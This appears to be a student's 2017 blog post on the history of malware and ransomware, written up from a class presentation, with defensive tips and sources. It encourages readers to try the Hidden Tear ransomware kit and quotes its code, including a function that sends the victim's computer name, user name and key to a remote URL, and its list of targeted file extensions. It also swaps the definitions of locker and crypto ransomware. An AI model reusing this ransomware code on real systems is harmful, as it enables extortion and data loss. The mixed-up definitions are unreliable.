paint-brush
Malware Attacks: The Evolution of Ransomwareby@tb.
641 reads
641 reads

Malware Attacks: The Evolution of Ransomware

by Tahfimul LatifJuly 12th, 2017
Read on Terminal Reader
Read this story w/o Javascript
tldt arrow

Too Long; Didn't Read

In this era, we are always susceptible to Malware Attacks.

Companies Mentioned

Mention Thumbnail
Mention Thumbnail
featured image - Malware Attacks: The Evolution of Ransomware
Tahfimul Latif HackerNoon profile picture

I presented a presentation on Malware Attacks to my engineering class. Presented on March 20, 2017

In this era, we are always susceptible to Malware Attacks.

This assignment taught me more about Malware Attacks than I would have known otherwise.

What is a Malware?

Malware is a piece of software that sits on your computer. This type of unwanted software has the intent to collect personal information, such as online banking log in, personal data on your computer and etc.

When did it start?

Malware Attacks in personal computers date back to 1986. A man by the name of Amjad Farooq Alvi and his fellow have decided to invent a friendly virus for experimental purposes. They did so by infecting floppy disks with their virus called “Brain”. Their virus soon spread around the globe and turned into a tool for committing evil acts by criminals.

Continuation

Ruthless criminals found better and more sophesticated methods of harming victims.

Over a decade after the release of Brain, CIH otherwise known as Chernobyl Virus was born. A man by the name of Chen Ing-hau had invented the virus. Unlike its predecessors, Chernobyl had the ability to rewrite data on a computer’s hard drive. Chernobyl was able to attack every application as the user accessed them and hide beneath the application by expanding its file size. Its presence could then be detected using an anti-virus software. A special ability of CIH was to re-write the Flash BIOS chip of computers. This led to the computer not booting up at all. The ultimate method of fixing it was to reprogram the chip.

Later, as the age of the internet was born, viruses started to spread through email. One of which was the Kak invented by Mayur Kamat.

“ …Kak…[was]…one of the very few true email viruses (1999) “ (Lifewire)

What are some tools used to create Malware?

There are many tools available to create Malware both for newbies and experienced.

VBS Worm Generator is a tool that is used to create an email worm. Its job is to effect a victim through sending an email and self replicate through sending emails to contacts under the victim’s email contact list.

Specific type of Malware: Ransomware

My teacher told me and my class to research a specific type of malware attack. I choose Ransomware.

History of Ransomware

It was started by a person named Joseph L. Popp. He decided to infect floppy disks with the first ransomware that he invented in 1989. The Ransomware was known as PC Cyborg. He then handed those disks out to 20,000 people in an AIDS conference. The victims were affected and were asked to pay ransom to a given address. Joseph was later caught by authorities, but never tried due to his mental condition.

Evolution of Ransomware

The age of the internet played a huge role in the development of Ransomware.

In 2005, criminals exploited advertisements asking victims to download misleading apps that would remove junk files from their computers. The victims often paid fees to obtain those software. In return, most of them were not effective at removing junk files. This was the pre-Ransomware era on the internet.

Later down the road, Trojans such as GpCoder started to emerge. It had the ability to look for certain file types in a computer and create a copy of the file. It would then delete the original file and make the copied file unable to be read.

As trojans of such are becoming more sophisticated, Ransomware business is getting bigger by the day.

Here are sources that Ransomware enter through:

Types of Ransomware

There are many types of Ransomware that have attacked victims. The pie chart below shows the most recent ones used as of this date:

Source: Microsoft

According to the latest data above, Tescrypt has been the most used Ransomware. It is a form of Crypto Ransomware.

RAA is another type of Ransomware that has been recently used. This is byfar the most known sophesticated Ransomware that has been used.

Kinds of functions of Ransomware

There are two kinds of functions that Ransomware offer, Locker Ransomware and Crypto Ransomware.

Locker Ransomware

Locker Ransomware looks for certain file types in a computer and encrypts the data.

Crypto Ransomware

Crypto Ransomware locks down an entire operating by rewriting the Master Boot Records (MBR) on the hard drive. MBR is a section of a hard drive that has instructions stored for booting up.

Tools used to create Ransomware

Just as with all other Malwares, there are several tools out there that can be used to create Ransomware. Two of which I found out are Shark and The Hidden Tear. Shark allows creators to customize the Ransomware to be used in a sophisticated manner. However, The Hidden Tear is a simple tool that highlights the basic functions of a Ransomware. I looked into this tool to be able to show the class and teach them some basic concepts of a Ransomware.

The Hidden Tear consists of several files. Two of the main files are “Hidden-Tear-Decrypter” and “Hidden-Tear”. “Hidden-Tear” is an executable file and a Locker Ransomware that encrypts data. The “Hidden-Tear-Decrypter” is another executable that is used to decrypt the files that were encrypted. This is not a harmful nor sophisticated form of Ransomware. It has been created for beginners to play around with. You may wish to check it out for experimental purposes only. Keep in mind that if you try it on devices of which owners did not permit, it would be a crime.

In order to set up the decrypter for this Ransomware, a web server needs to be set up. The web server has to support either PHP or Python language. Then you need to edit the following by replacing the targetURL with a website that you created to retrieve the private decryption key.

“string targetURL = “https://www.example.com/hidden-tear/write.php?info=";” (The Hacker News)

Next crucial part of the code to look at is the “Sending Process”





“SendPassword() {string info = computerName + “-” + userName + “ “ + password;var fullUrl = targetURL + info;var conent = new System.Net.WebClient().DownloadString(fullUrl);}” (The Hacker News)

This is the proccess that will handle request for a decryption code for the decrypter.

Last part to look at are the file extensions that the encrypter will look for.



“ var validExtensions = new[]{ “.txt”, “.doc”, “.docx”, “.xls”, “.xlsx”, “.ppt”, “.pptx”, “.odt”, “.jpg”, “.png”, “.csv”, “.sql”, “.mdb”, “.sln”, “.php”, “.asp”, “.aspx”, “.html”, “.xml”, “.psd” }; ” (The Hacker News)

The Hidden Tear comes default with these file extensions. However, you have the choice to modify them.

If you are going to try this, please use a virtual machine on devices that you choose to use it on. This guide is for educational purposes only.

Hidden Tear Demonstration

How do users get attacked?

There are many social engineering skills that are used to get a user to download the payload. A payload is simply a downloader. Once the payload has been downloaded, it connects to the hacker’s server. In the downloading process, a public encryption key is sent. That key starts to encrypt data in your computer.

If you remember, a little ago we talked about RAA Ransomware. This Ransomware is different in that it is the Ransomware itself. Therefore, no Payload is needed to get the public encryption key. It is eaiser for a criminal to attack a computer using this tactic.

Once the data has been locked down, a message similar to the one below is displayed:

Source: Insurance Thought Leadership

As you can see from the image, the hacker is asking to be paid in the form of electronic currency. The currency is called “Bitcoin”. Hackers prefer to use this over monetary value due to it being hard to track. Authorities are finding it difficult to catch these bad guys for this reason.

Another factor is that the server will wait for a certain time period. As seen on the image above, 72 Hours would be an example. Therefore, if a victim wanted to pay Ransom to get their files back, they would not be able to do so after the given time period.

How much is payed?

According to onthewire, 600 companies who were victims of this kind of attack were surveyed. It was identified that about 45% of them have payed between $20,000 to amounts greater than $40,000. Most of the hackers tend to attack big corporates because there is a higher chance of big profit.

How do the files get decrypted?

Once the victims pay the fee, the hacker’s server sends back a Private Decryption Key to the victim. This Private Decryption Key unlocks the data that have been locked. However, there is no guarantee that the hacker will send the Private Decryption Key to the user. This is why it is better to say no and start from scratch or from back up.

Even if you get your files back, you are at a greater risk of being attacked again. The hackers usually attach a piece of software with the Private Decryption Key which will keep the data alive. One example of such software would be a Key Logger. Key Loggers log every key that is being typed by a user. This makes it possible for the hacker to steal personal information. If your anti-virus happens to detect the malicious software and you remove it, your data will be lost forever.

What can you do to protect yourself?

There are several options available to protect yourself from Ransomware or other Malware Attacks.

1. Create a back up of your entire operating system in an external hard drive.

2. Update every software on your computer to their latest versions.

3. NEVER click on unwanted sources or sources that you do not know about on the internet. This includes getting an email from somebody whom you should not have received an email from. You should double check the sender of the emails you receive. Be highly skeptical about downloading from websites that claim to provide you “free” software. This can be used as a form of social engineering to convince you to load your computer with a potential ransomware.

4. Edit Firewall settings on your computer. Firewall is a tool that handles network permissions for applications that run on your computer. A hacker will not be able to establish a connection through applications if you do not permit the applications to connect to a network.

5. If you use Windows, there is a feature called user control. User control notifies you everytime a new application tries to make changes to your computer.

Presentation

Here is the presentation that I presented to my engineering class.


Latif_Tahfimul_HW_Malware_3_20_17_Malware Attacks_docs.google.com

Sources

1. https://techterms.com/definition/malware

2. http://www.computerhope.com/vcih.htm

3. https://www.f-secure.com/v-descs/iworm.shtml

4. https://www.lifewire.com/brief-history-of-malware-153616

5. https://blog.varonis.com/a-brief-history-of-ransomware/

6. http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-evolution-of-ransomware.pdf

7. http://blogs.systweak.com/2016/08/ransomware-statistics-growth-of-ransomware-in-2016/

8. https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx

9. https://nakedsecurity.sophos.com/2016/06/20/ransomware-thats-100-pure-javascript-no-download-required/

10. http://thehackernews.com/2015/08/ransomware-creator-toolkit.html

11. https://www.onthewire.io/70-percent-of-enterprise-ransomware-victims-paid-up-data-shows/

12. https://securityledger.com/2015/10/fbis-advice-on-cryptolocker-just-pay-the-ransom/

13. https://www.youtube.com/watch?v=LtiRISepIfs&feature=youtu.be